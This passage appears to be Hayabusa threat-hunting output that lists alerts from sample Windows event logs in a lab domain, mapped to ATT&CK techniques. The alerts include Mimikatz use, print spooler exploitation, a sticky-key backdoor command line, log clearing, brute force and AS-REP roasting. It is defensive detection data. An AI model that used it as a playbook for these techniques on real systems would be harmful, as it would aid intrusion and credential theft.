Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 
0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx -2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx -2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL 
serverlevelplugindll command.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- -2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target 
User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- -2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC 
Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.380 
+09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx -2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx -2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" -2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" -2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx -2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx -2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 04:39:52.895 
+09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx -2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx -2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec 
